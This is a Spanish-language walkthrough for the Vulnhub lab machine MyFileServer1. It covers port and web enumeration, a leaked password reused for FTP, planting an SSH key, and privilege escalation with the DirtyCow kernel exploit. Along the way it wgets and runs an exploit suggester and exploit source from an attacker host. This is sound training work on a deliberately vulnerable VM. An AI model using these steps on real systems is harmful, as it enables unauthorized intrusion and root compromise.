[VLN] MyFileServer1

Hoy vamos a hackear la maquina de Vulnhub llamada MyFileServer1. Podeis descargarla desde el siguiente enlace: https://www.vulnhub.com/entry/my-file-server-1,432/
  • Enumeration
  • Empezamos con un nmap para ver que puertos tiene abiertos.
    sml@Cassandra:~$ nmap -p- -A 192.168.1.85 Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-27 11:03 CET Nmap scan report for fileserver.home (192.168.1.85) Host is up (0.00055s latency). Not shown: 64523 filtered ports, 1004 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.2 | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_drwxrwxrwx 3 0 0 16 Feb 19 07:48 pub [NSE: writeable] | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:192.168.1.148 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 3 | vsFTPd 3.0.2 - secure, fast, stable |_End of status 22/tcp open ssh OpenSSH 7.4 (protocol 2.0) | ssh-hostkey: | 2048 75:fa:37:d1:62:4a:15:87:7e:21:83:b9:2f:ff:04:93 (RSA) | 256 b8:db:2c:ca:e2:70:c3:eb:9a:a8:cc:0e:a2:1c:68:6b (ECDSA) |_ 256 66:a3:1b:55:ca:c2:51:84:41:21:7f:77:40:45:d4:9f (ED25519) 80/tcp open http Apache httpd 2.4.6 ((CentOS)) | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Apache/2.4.6 (CentOS) |_http-title: My File Server 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100000 3,4 111/tcp6 rpcbind | 100000 3,4 111/udp6 rpcbind | 100003 3,4 2049/tcp nfs | 100003 3,4 2049/tcp6 nfs | 100003 3,4 2049/udp nfs | 100003 3,4 2049/udp6 nfs | 100005 1,2,3 20048/tcp mountd | 100005 1,2,3 20048/tcp6 mountd | 100005 1,2,3 20048/udp mountd | 100005 1,2,3 20048/udp6 mountd | 100021 1,3,4 40143/udp nlockmgr | 100021 1,3,4 44733/tcp6 nlockmgr | 100021 1,3,4 45664/udp6 nlockmgr | 100021 1,3,4 60055/tcp nlockmgr | 100024 1 34834/udp status | 100024 1 39810/udp6 status | 100024 1 44480/tcp status | 100024 1 60715/tcp6 status | 100227 3 2049/tcp nfs_acl | 100227 3 2049/tcp6 nfs_acl | 100227 3 2049/udp nfs_acl |_ 100227 3 2049/udp6 nfs_acl 445/tcp open netbios-ssn Samba smbd 4.9.1 (workgroup: SAMBA) 2049/tcp open nfs_acl 3 (RPC #100227) 2121/tcp open ftp ProFTPD 1.3.5 | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_Can't get directory listing: ERROR 20048/tcp open mountd 1-3 (RPC #100005) Service Info: Host: FILESERVER; OS: Unix Host script results: |_clock-skew: mean: -1h50m00s, deviation: 3h10m30s, median: -1s | smb-os-discovery: | OS: Windows 6.1 (Samba 4.9.1) | Computer name: localhost | NetBIOS computer name: FILESERVER\x00 | Domain name: \x00 | FQDN: localhost |_ System time: 2020-03-27T15:34:27+05:30 | smb-security-mode: | account_used: | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-03-27T10:04:26 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 86.05 seconds
    Podemos ver que tiene muchos puertos abiertos, asi que es momento de ver que informacion podemos sacar.
    sml@Cassandra:~$ nikto -h http://192.168.1.85 - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 192.168.1.85 + Target Hostname: 192.168.1.85 + Target Port: 80 + Start Time: 2020-03-27 11:07:43 (GMT1) --------------------------------------------------------------------------- + Server: Apache/2.4.6 (CentOS) + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + Apache/2.4.6 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch. + Allowed HTTP Methods: OPTIONS, GET, HEAD, POST, TRACE + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST + OSVDB-3092: /readme.txt: This might be interesting... + OSVDB-3268: /icons/: Directory indexing found. + OSVDB-3233: /icons/README: Apache default file found. + 8724 requests: 0 error(s) and 9 item(s) reported on remote host + End Time: 2020-03-27 11:08:36 (GMT1) (53 seconds) --------------------------------------------------------------------------- + 1 host(s) tested
    Nikto detecta el fichero readme.txt el cual si vemos http://192.168.1.85/readme.txt encontramos el siguiente texto: My Password is rootroot1 Seguimos buscando mas informacion que pueda sernos util.
    sml@Cassandra:/tmp$ smbmap -H 192.168.1.85 [+] IP: 192.168.1.85:445 Name: fileserver.home Disk Permissions Comment ---- ----------- ------- print$ NO ACCESS Printer Drivers smbdata READ, WRITE smbdata smbuser NO ACCESS smbuser IPC$ NO ACCESS IPC Service (Samba 4.9.1)
    Podemos ver que en Samba hay 2 carpetas, una llamada smbdata y otra smbuser.
    sml@Cassandra:/tmp$ smbmap -H 192.168.1.85 -R [+] IP: 192.168.1.85:445 Name: fileserver.home Disk Permissions Comment ---- ----------- ------- print$ NO ACCESS Printer Drivers smbdata READ, WRITE smbdata .\smbdata\* dr--r--r-- 0 Fri Mar 27 11:23:08 2020 . dr--r--r-- 0 Tue Feb 18 12:47:54 2020 .. dr--r--r-- 0 Tue Feb 18 12:48:15 2020 anaconda dr--r--r-- 0 Tue Feb 18 12:48:15 2020 audit fr--r--r-- 6120 Tue Feb 18 12:48:16 2020 boot.log fr--r--r-- 384 Tue Feb 18 12:48:16 2020 btmp fr--r--r-- 4813 Tue Feb 18 12:48:16 2020 cron fr--r--r-- 31389 Tue Feb 18 12:48:16 2020 dmesg fr--r--r-- 31389 Tue Feb 18 12:48:16 2020 dmesg.old dr--r--r-- 0 Tue Feb 18 12:48:16 2020 glusterfs fr--r--r-- 292292 Tue Feb 18 12:48:16 2020 lastlog fr--r--r-- 1982 Tue Feb 18 12:48:16 2020 maillog fr--r--r-- 684379 Tue Feb 18 12:48:16 2020 messages dr--r--r-- 0 Tue Feb 18 12:48:16 2020 ppp dr--r--r-- 0 Tue Feb 18 12:48:16 2020 samba fr--r--r-- 11937 Tue Feb 18 12:48:16 2020 secure fr--r--r-- 0 Tue Feb 18 12:48:16 2020 spooler fr--r--r-- 0 Tue Feb 18 12:48:16 2020 tallylog dr--r--r-- 0 Tue Feb 18 12:48:16 2020 tuned fr--r--r-- 25728 Tue Feb 18 12:48:17 2020 wtmp fr--r--r-- 100 Tue Feb 18 12:48:17 2020 xferlog fr--r--r-- 10915 Tue Feb 18 12:48:17 2020 yum.log fr--r--r-- 3906 Wed Feb 19 08:46:38 2020 sshd_config .\smbdata\anaconda\* dr--r--r-- 0 Tue Feb 18 12:48:15 2020 . dr--r--r-- 0 Fri Mar 27 11:23:08 2020 .. fr--r--r-- 21532 Tue Feb 18 12:48:15 2020 anaconda.log fr--r--r-- 66090 Tue Feb 18 12:48:15 2020 syslog fr--r--r-- 22750 Tue Feb 18 12:48:15 2020 anaconda.xlog fr--r--r-- 25353 Tue Feb 18 12:48:15 2020 anaconda.program.log fr--r--r-- 123159 Tue Feb 18 12:48:15 2020 anaconda.packaging.log fr--r--r-- 95767 Tue Feb 18 12:48:15 2020 anaconda.storage.log fr--r--r-- 1894 Tue Feb 18 12:48:15 2020 anaconda.ifcfg.log fr--r--r-- 0 Tue Feb 18 12:48:15 2020 ks-script-JI8Xco.log fr--r--r-- 0 Tue Feb 18 12:48:15 2020 ks-script-vT7qk9.log .\smbdata\audit\* dr--r--r-- 0 Tue Feb 18 12:48:15 2020 . dr--r--r-- 0 Fri Mar 27 11:23:08 2020 .. fr--r--r-- 840450 Tue Feb 18 12:48:16 2020 audit.log .\smbdata\samba\* dr--r--r-- 0 Tue Feb 18 12:48:16 2020 . dr--r--r-- 0 Fri Mar 27 11:23:08 2020 .. dr--r--r-- 0 Tue Feb 18 12:48:16 2020 old fr--r--r-- 168 Tue Feb 18 12:48:16 2020 log.smbd dr--r--r-- 0 Tue Feb 18 12:48:16 2020 cores .\smbdata\samba\cores\* dr--r--r-- 0 Tue Feb 18 12:48:16 2020 . dr--r--r-- 0 Tue Feb 18 12:48:16 2020 .. dr--r--r-- 0 Tue Feb 18 12:48:16 2020 smbd .\smbdata\tuned\* dr--r--r-- 0 Tue Feb 18 12:48:16 2020 . dr--r--r-- 0 Fri Mar 27 11:23:08 2020 .. fr--r--r-- 15722 Tue Feb 18 12:48:16 2020 tuned.log smbuser NO ACCESS smbuser IPC$ NO ACCESS IPC Service (Samba 4.9.1)
    Despues de revisar todos los puertos lo unico que tenemos es un posible usuario llamado smbuser y el password rootroot1. Probamos en varios servicios, y vemos que en el FTP acepta los credenciales smbuser/rootroot1.
  • Low shell
  • sml@Cassandra:~$ ftp 192.168.1.85 Connected to 192.168.1.85. 220 (vsFTPd 3.0.2) Name (192.168.1.85:sml): smbuser 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files.
    Al loguearnos en el FTP como smbuser vemos que aparentemente estamos en su /home, asi que copiamos nuestra clave publica de ssh (id_rsa.pub) en un fichero llamado authorized_keys y subimos dicho fichero a la carpeta .ssh de smbuser a traves del FTP. Creando antes la carpeta .ssh en el FTP como se ve a continuacion.
    sml@Cassandra:~$ cp .ssh/id_rsa.pub authorized_keys sml@Cassandra:~$ ftp 192.168.1.85 Connected to 192.168.1.85. 220 (vsFTPd 3.0.2) Name (192.168.1.85:sml): smbuser 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> mkdir .ssh 257 "/home/smbuser/.ssh" created ftp> cd .ssh 250 Directory successfully changed. ftp> put authorized_keys local: authorized_keys remote: authorized_keys 200 PORT command successful. Consider using PASV. 150 Ok to send data. 226 Transfer complete. 567 bytes sent in 0.00 secs (22.5306 MB/s)
    Una vez realizado conectamos por ssh :)
    sml@Cassandra:~$ ssh smbuser@192.168.1.85 ################################################################################ ############## # Armour Infosec # # --------- www.armourinfosec.com ------------ # # My File Server - 1 # # Designed By :- Akanksha Sachin Verma # # Twitter :- @akankshavermasv # ################################################################################ ############## Last login: Fri Mar 27 17:20:37 2020 from cassandra.home [smbuser@fileserver ~]$ id uid=1000(smbuser) gid=1000(smbuser) grupos=1000(smbuser) [smbuser@fileserver ~]$
  • Privilege Escalation
  • Una vez dentro del sistema vamos a descargarnos el script[1] para que nos sugiera algun exploit que pueda funcionarnos en el sistema.
    [smbuser@fileserver ~]$ cd /tmp [smbuser@fileserver tmp]$ wget http://192.168.1.148/lin.sh --2020-03-27 17:27:52-- http://192.168.1.148/lin.sh Conectando con 192.168.1.148:80... conectado. Petición HTTP enviada, esperando respuesta... 200 OK Longitud: 84245 (82K) [application/octet-stream] Grabando a: “lin.sh” 100%[=========================================================================== =================================================>] 84.245 --.-K/s en 0,001s 2020-03-27 17:27:52 (114 MB/s) - “lin.sh” guardado [84245/84245] [smbuser@fileserver tmp]$ sh lin.sh Available information: Kernel version: 3.10.0 Architecture: x86_64 Distribution: RHEL Distribution version: 7 Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed Package listing: from current OS Searching among: 73 kernel space exploits 45 user space exploits Possible Exploits: [+] [CVE-2016-5195] dirtycow Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails Exposure: highly probable Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10) .*|2.6.33.9-rt31},[ RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7} ],ubuntu=16.04|14.04|12.04 Download URL: https://www.exploit-db.com/download/40611 Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh [+] [CVE-2016-5195] dirtycow 2 Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails Exposure: highly probable Tags: debian=7|8,[ RHEL=5|6|7 ],ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel: 4.4.0-21-generic} Download URL: https://www.exploit-db.com/download/40839 ext-url: https://www.exploit-db.com/download/40847.cpp Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh [+] [CVE-2017-1000367] Sudoer-to-root Details: https://www.sudo.ws/alerts/linux_tty.html Exposure: probable Tags: [ RHEL=7 ]{sudo:1.8.6p7} Download URL: https://www.qualys.com/2017/05/30/cve-2017-1000367/linux_sudo_cve-2017-1000367.c Comments: Needs to be sudoer. Works only on SELinux enabled systems --SNIP--
    Nos sugiere varios, asi que vamos a utilizar[2] [CVE-2016-5195] dirtycow 2.
    [smbuser@fileserver tmp]$ wget http://192.168.1.148/40839.c --2020-03-27 17:30:44-- http://192.168.1.148/40839.c Conectando con 192.168.1.148:80... conectado. Petición HTTP enviada, esperando respuesta... 200 OK Longitud: 5006 (4,9K) [application/octet-stream] Grabando a: “40839.c” 100%[=========================================================================== =================================================>] 5.006 --.-K/s en 0s 2020-03-27 17:30:44 (756 MB/s) - “40839.c” guardado [5006/5006] smbuser@fileserver tmp]$ mv 40839.c dirty.c [smbuser@fileserver tmp]$ gcc -pthread dirty.c -o dirty -lcrypt [smbuser@fileserver tmp]$ ./dirty /etc/passwd successfully backed up to /tmp/passwd.bak Please enter the new password: Complete line: firefart:fiWZ83NyER86M:0:0:pwned:/root:/bin/bash mmap: 7f5c984d8000
    Una vez ejecutado el exploit, abrimos otra conexion ssh (en paralelo) para loguearnos como firefart y tener los privilegios de root.
    sml@Cassandra:~$ ssh smbuser@192.168.1.85 [smbuser@fileserver ~]$ su firefart Contraseña: [firefart@fileserver smbuser]# id uid=0(firefart) gid=0(root) grupos=0(root) [firefart@fileserver smbuser]# cd /root [firefart@fileserver ~]# ls proof.txt [firefart@fileserver ~]# cat proof.txt Best of Luck af52e0163b03cbf7c6dd146351594a43
  • End
  • Y con esto ya seriamos root de la maquina :) [1]https://github.com/mzet-/linux-exploit-suggester/blob/master/linux-exploit-su ggester.sh [2]https://www.exploit-db.com/exploits/40839